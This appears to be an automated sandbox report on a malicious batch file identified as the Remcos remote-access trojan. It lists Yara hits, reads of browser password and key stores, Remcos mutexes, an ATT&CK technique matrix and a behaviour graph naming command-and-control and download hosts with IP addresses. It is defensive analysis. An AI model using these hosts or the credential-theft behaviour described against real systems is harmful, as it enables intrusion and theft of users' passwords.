                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.2751486587.0000000008A87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2252250805.0000000007437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3849765879.0000000008920000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3123710586.0000000008723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4282483846.0000000008707000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3517844786.0000000008AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.3139004207.0000000008EE7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3521971926.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2740109130.0000000008561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2577352879.00000000089BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4705414625.00000000086A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2897148363.0000000006D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000036.00000002.3545950157.00000000090E7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3891764993.0000000009467000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2409566174.0000000007820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000003B.00000002.3788098301.000000000769E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.2925202742.0000000008637000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000045.00000002.4640955762.0000000007E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000040.00000002.4202711770.0000000007E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3395971094.0000000008E87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2416886326.0000000009047000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2582377571.0000000008F57000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000031.00000002.3369936433.00000000086E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting
                          Valid Accounts11
                          Native API
                          1
                          Scripting
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          1
                          OS Credential Dumping
                          1
                          Account Discovery
                          Remote Services12
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter
                          1
                          DLL Side-Loading
                          1
                          Access Token Manipulation
                          1
                          Obfuscated Files or Information
                          11
                          Input Capture
                          3
                          File and Directory Discovery
                          Remote Desktop Protocol1
                          Data from Local System
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          PowerShell
                          1
                          Office Application Startup
                          111
                          Process Injection
                          1
                          Install Root Certificate
                          Security Account Manager13
                          System Information Discovery
                          SMB/Windows Admin Shares11
                          Input Capture
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron2
                          Registry Run Keys / Startup Folder
                          2
                          Registry Run Keys / Startup Folder
                          1
                          Software Packing
                          NTDS11
                          Security Software Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          1
                          Remote Access Software
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets2
                          Process Discovery
                          SSHKeylogging2
                          Non-Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading
                          Cached Domain Credentials121
                          Virtualization/Sandbox Evasion
                          VNCGUI Input Capture213
                          Application Layer Protocol
                          Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Modify Registry
                          DCSync1
                          Application Window Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          System Owner/User Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612233 Sample: uowzo4rEa5.bat Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 74 abokirem.duckdns.org 2->74 76 geoplugin.net 2->76 78 0x0.st 2->78 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 96 16 other signatures 2->96 9 cmd.exe 1 2->9         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 13 other processes 2->16 signatures3 94 Uses dynamic DNS services 74->94 process4 signatures5 106 Suspicious powershell command line found 9->106 108 Bypasses PowerShell execution policy 9->108 18 cmd.exe 3 9->18         started        21 conhost.exe 9->21         started        23 cmd.exe 2 12->23         started        25 conhost.exe 12->25         started        27 cmd.exe 2 14->27         started        29 conhost.exe 14->29         started        31 cmd.exe 2 16->31         started        33 cmd.exe 16->33         started        35 24 other processes 16->35 process6 signatures7 86 Suspicious powershell command line found 18->86 37 powershell.exe 19 34 18->37         started        42 conhost.exe 18->42         started        44 powershell.exe 15 23->44         started        46 conhost.exe 23->46         started        48 powershell.exe 27->48         started        50 conhost.exe 27->50         started        52 2 other processes 31->52 54 2 other processes 33->54 56 22 other processes 35->56 process8 dnsIp9 80 abokirem.duckdns.org 37.120.208.40, 49705, 49708, 56379 M247GB Romania 37->80 82 0x0.st 168.119.145.117, 443, 49704, 49706 HETZNER-ASDE Germany 37->82 84 geoplugin.net 178.237.33.50, 49709, 80 ATOM86-ASATOM86NL Netherlands 37->84 68 C:\Users\user\...\StartupScript_82916eff.cmd, ASCII 37->68 dropped 70 C:\ProgramData\remcos\logs.dat, data 37->70 dropped 98 Detected Remcos RAT 37->98 100 Suspicious powershell command line found 37->100 102 Installs new ROOT certificates 37->102 104 3 other signatures 37->104 58 powershell.exe 37->58         started        62 powershell.exe 1 37->62         started        64 powershell.exe 37->64         started        66 4 other processes 37->66 file10 signatures11 process12 file13 72 C:\Users\...\qmkvvvalmabsljlqxrjezibbbpjp, Unicode 58->72 dropped 110 Tries to harvest and steal browser information (history, passwords, etc) 58->110 signatures14

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.